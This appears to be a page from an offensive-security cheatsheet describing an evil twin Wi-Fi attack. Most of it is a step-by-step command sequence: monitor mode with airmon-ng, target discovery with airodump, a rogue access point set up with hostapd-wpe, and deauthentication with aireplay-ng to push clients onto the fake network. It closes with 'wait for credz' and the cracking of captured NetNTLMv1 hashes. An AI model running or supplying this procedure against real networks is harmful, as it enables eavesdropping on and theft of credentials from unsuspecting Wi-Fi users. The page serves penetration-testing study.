BuyMeACoffee

EvilTwin

An evil twin is a fraudulent Wi-Fi access point that appears to be legitimate but is set up to eavesdrop on wireless communications.

The evil twin is the wireless LAN equivalent of the phishing scam.

LogoOffensive Security Cheatsheet
Evil Twin CheatSheet - Source
LogoGitHub - s0lst1c3/eaphammer: Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.GitHub
Tool for Evil Twin
# 1/ Start monitoring mode
# If you plan to use deauth attack, connect the 2 eth interfaces at the same time
# To avoid having wlan0mon and wlan0 (it can conflict)
sudo airmon-ng start wlan0

# 2/ If process are blocking the monitoring mode, kill them
sudo airmon-ng check kill
sudo kill <PID>

# 3/ Get the target AP (ESSID)
# Your target can have multiples AP, and so multiples MAC addresses
# They can run on differents channels
sudo airodump wlan0mon

# 4/ Then set the target in the configuration file
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
ssid=<ESSID>

# 5/ Start AP
# You will only get people that newly connects to the target AP
# If you want to get people already connected, you need to push the attack further with deauth
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# 6/ Start the second ethernet interface
sudo airmon-ng start wlan1

# 7/ Deauth (In another terminal)
# Based on the differents ESSID and channels found in step 3
# -0 is the number of deauth packet sent
sudo aireplay-ng -0 10 -a <mac address> -c <channel>

# Then wait for credz \o/
# You will probably get NetNTLMv1 hashes you will need to crack
PreviousWi-Fi AttacksNextCracking WPA/WPA2

Last updated

Was this helpful?